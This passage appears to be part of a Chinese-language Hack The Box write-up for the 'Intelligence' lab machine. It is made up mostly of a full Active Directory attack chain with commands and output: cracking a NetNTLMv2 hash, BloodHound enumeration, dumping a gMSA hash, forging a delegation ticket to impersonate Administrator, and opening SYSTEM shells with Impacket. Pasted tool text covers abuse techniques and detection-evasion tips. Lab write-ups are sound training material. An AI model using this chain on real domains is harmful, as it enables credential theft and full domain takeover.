Ted.Graves::intelligence:55d715a0f1b61eca:F1339196011CD69F875E8E722DA39D19:0101000000000000163AB6657E84DA01DF6CCD119A4C9F5B00000000020008004A0041004800470001001E00570049004E002D00460053003100520048004D0048004600510036004A00040014004A004100480047002E004C004F00430041004C0003003400570049004E002D00460053003100520048004D0048004600510036004A002E004A004100480047002E004C004F00430041004C00050014004A004100480047002E004C004F00430041004C00080030003000000000000000000000000020000042953171FBEFDE40C17FFC1A59EE6BBD28BDA280BDCCEB581936E5420526A2E70A001000000000000000000000000000000000000900400048005400540050002F007700650062002D00730068006900790061006E002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 5600 hash  /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1439/2942 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

TED.GRAVES::intelligence:55d715a0f1b61eca:f1339196011cd69f875e8e722da39d19:0101000000000000163ab6657e84da01df6ccd119a4c9f5b00000000020008004a0041004800470001001e00570049004e002d00460053003100520048004d0048004600510036004a00040014004a004100480047002e004c004f00430041004c0003003400570049004e002d00460053003100520048004d0048004600510036004a002e004a004100480047002e004c004f00430041004c00050014004a004100480047002e004c004f00430041004c00080030003000000000000000000000000020000042953171fbefde40c17ffc1a59ee6bbd28bda280bdcceb581936e5420526a2e70a001000000000000000000000000000000000000900400048005400540050002f007700650062002d00730068006900790061006e002e0069006e00740065006c006c006900670065006e00630065002e006800740062000000000000000000:Mr.Teddy
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: TED.GRAVES::intelligence:55d715a0f1b61eca:f13391960...000000
Time.Started.....: Mon Apr  1 22:51:54 2024 (8 secs)
Time.Estimated...: Mon Apr  1 22:52:02 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1433.4 kH/s (0.57ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10814464/14344385 (75.39%)
Rejected.........: 0/10814464 (0.00%)
Restore.Point....: 10813440/14344385 (75.38%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Ms.Jordan -> Mr.Brownstone
Hardware.Mon.#1..: Util: 84%

Started: Mon Apr  1 22:51:42 2024
Stopped: Mon Apr  1 22:52:03 2024

19、验证该账号密码是否正确

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.10.248 -u TED.GRAVES -p Mr.Teddy                                      
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.248    445    DC               [+] intelligence.htb\TED.GRAVES:Mr.Teddy 

20、由于是域环境，想登录到域控主机上，还是有些难度的，但是通过获取的账号信息，进行信息枚举还是可以的

┌──(kali㉿offsec)-[~/Desktop]
└─$ bloodhound-python -ns 10.10.10.248 -d intelligence.htb -dc dc.intelligence.htb -u Ted.Graves -p Mr.Teddy
INFO: Found AD domain: intelligence.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 43 users
INFO: Found 55 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.intelligence.htb
INFO: Done in 00M 48S

21、下面启动下neo4j数据库，就开始上传分析吧

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo neo4j start
[sudo] kali 的密码：
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /etc/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:53161). It is available at http://localhost:7474
There may be a short delay until the server is ready.

上传到分析平台上

在 Bloodhound 中，将用户Tiffany.Molina和Ted.Graves标记为拥有，并将用户svc_int和管理员标记为高价值目标。

22、开始研究整个的攻击路径

SVC_INT$@INTELLIGENCE.HTB is a Group Managed Service Account. The group ITSUPPORT@INTELLIGENCE.HTB can retrieve the password for the GMSA SVC_INT$@INTELLIGENCE.HTB.

Group Managed Service Accounts are a special type of Active Directory object, where the password for that object is mananaged by and automatically changed by Domain Controllers on a set interval (check the MSDS-ManagedPasswordInterval attribute).

The intended use of a GMSA is to allow certain computer accounts to retrieve the password for the GMSA, then run local services as the GMSA. An attacker with control of an authorized principal may abuse that privilege to impersonate the GMSA.

SVC_INT$@智能。HTB是一个集团管理服务帐户。该组ITSUPPORT@INTELLIGENCE.HTB可以检索GMSA SVC_INT$@INTELLIGENCE的密码。HTB。

组管理服务帐户是一种特殊类型的Active Directory对象，其中该对象的密码由域控制器管理，并由域控制器按设置的时间间隔自动更改（请检查MSDS ManagedPasswordInterval属性）。

GMSA的预期用途是允许某些计算机帐户检索GMSA的密码，然后作为GMSA运行本地服务。拥有授权主体控制权的攻击者可能会滥用该权限来模拟GMSA。

There are several ways to abuse the ability to read the GMSA password. The most straight forward abuse is possible when the GMSA is currently logged on to a computer, which is the intended behavior for a GMSA. If the GMSA is logged on to the computer account which is granted the ability to retrieve the GMSA's password, simply steal the token from the process running as the GMSA, or inject into that process.

If the GMSA is not logged onto the computer, you may create a scheduled task or service set to run as the GMSA. The computer account will start the sheduled task or service as the GMSA, and then you may abuse the GMSA logon in the same fashion you would a standard user running processes on the machine (see the "HasSession" help modal for more details).

Finally, it is possible to remotely retrieve the password for the GMSA and convert that password to its equivalent NT hash.gMSADumper.py can be used for that purpose.

gMSADumper.py -u 'user' -p 'password' -d 'domain.local'
At this point you are ready to use the NT hash the same way you would with a regular user account. You can perform pass-the-hash, overpass-the-hash, or any other technique that takes an NT hash as an input.

有几种方法可以滥用读取GMSA密码的能力。当GMSA当前登录到计算机时，最直接的滥用是可能的，这是GMSA的预期行为。如果GMSA登录到被授予检索GMSA密码能力的计算机帐户，只需从作为GMSA运行的进程中窃取令牌，或注入该进程。

如果GMSA未登录到计算机上，则可以创建一个计划任务或服务集以作为GMSA运行。计算机帐户将作为GMSA启动计划的任务或服务，然后您可能会滥用GMSA登录，就像在计算机上运行进程的标准用户一样（有关更多详细信息，请参阅“HasSession”帮助模式）。

最后，可以远程检索GMSA的密码，并将该密码转换为等效的NT哈希。MSADumper.py可以用于此目的。

gMSADumper.py-u“用户”-p“密码”-d“域.local”
此时，您可以像使用普通用户帐户一样使用NT哈希了。您可以执行传递散列、跨越散列或任何其他将NT散列作为输入的技术。

When abusing a GMSA that is already logged onto a system, you will have the same opsec considerations as when abusing a standard user logon. For more information about that, see the "HasSession" modal's opsec considerations tab.

When retrieving the GMSA password from Active Directory, you may generate a 4662 event on the Domain Controller; however, that event will likely perfectly resemble a legitimate event if you request the password from the same context as a computer account that is already authorized to read the GMSA password.

当滥用已经登录到系统上的GMSA时，您将与滥用标准用户登录时有相同的opsec注意事项。有关这方面的更多信息，请参阅“HasSession”模态的opsec注意事项选项卡。

从Active Directory检索GMSA密码时，您可以在域控制器上生成4662事件；但是，如果您从与已被授权读取GMSA密码的计算机帐户相同的上下文中请求密码，则该事件很可能与合法事件完全相似。

https://github.com/micahvandeusen/gMSADumper

23、也就是说，这里可以滥用读取GMSA密码的，这里先使用这个工具进行获取下密码哈希吧

┌──(kali㉿offsec)-[~/Desktop/gMSADumper]
└─$ python3 gMSADumper.py -u 'TED.GRAVES' -p 'Mr.Teddy' -d 'intelligence.htb'
Users or groups who can read password for svc_int$:
 > DC$
 > itsupport
svc_int$:::486b1ed2229329984333a964b71045e9
svc_int$:aes256-cts-hmac-sha1-96:0d542d3dac3287785fe6d87d4e242bfcbcd3bf999541f31cd1b058e42ed2992a
svc_int$:aes128-cts-hmac-sha1-96:e85b1861ce4c561627b9532b64d86460

24、接下来使用该服务账号构造一个票据进行登录服务器，下面先把时间与域控时间同步，这样好构造票据，要与目标主机同步时间，我们需要首先通过运行命令来停用自动时间同步timedatectl set-ntp 0。之后，我们可以执行 sudo ntpdate -s intelligence.htb来启动同步过程。

┌──(kali㉿offsec)-[~/Desktop/gMSADumper]
└─$ sudo timedatectl set-ntp 0

┌──(kali㉿offsec)-[~/Desktop/gMSADumper]
└─$ date && sudo ntpdate -s intelligence.htb && date
2024年 04月 01日 星期一 23:23:59 CST
2024年 04月 02日 星期二 06:23:59 CST

25、生成票据文件

┌──(kali㉿offsec)-[~/Desktop/gMSADumper]
└─$ impacket-getST -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes :486b1ed2229329984333a964b71045e9
Impacket v0.11.0 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

┌──(kali㉿offsec)-[~/Desktop/gMSADumper]
└─$ ls             
Administrator.ccache  COPYING  gMSADumper.py  __init__.py  README.md  requirements.txt

26、为了获得 shell，我将使用wmiexec（Impacket 附带的）。-k将指定 Kerberos 身份验证。我将设置KRB5CCNAME环境变量以指向我要使用的票证文件。

┌──(kali㉿offsec)-[~/Desktop/gMSADumper]
└─$ KRB5CCNAME=Administrator.ccache impacket-wmiexec -k -no-pass administrator@dc.intelligence.htb
Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
intelligence\administrator

27、可以看到是管理员账号，那我们继续使用 impacket-psexec 这个工具来生成system的权限，来读取flag吧

┌──(kali㉿offsec)-[~/Desktop/gMSADumper]
└─$ KRB5CCNAME=Administrator.ccache  impacket-psexec -dc-ip dc.intelligence.htb -k "intelligence.htb/Administrator@dc.intelligence.htb" -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on dc.intelligence.htb.....
[*] Found writable share ADMIN$
[*] Uploading file SOMzpjgG.exe
[*] Opening SVCManager on dc.intelligence.htb.....
[*] Creating service ancH on dc.intelligence.htb.....
[*] Starting service ancH.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> cd C:/Users/Administrator/Desktop
 
C:\Users\Administrator\Desktop> type root.txt
44f316f48f6250723dfd91afb7dcfabb

C:\Users\Administrator\Desktop> 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/357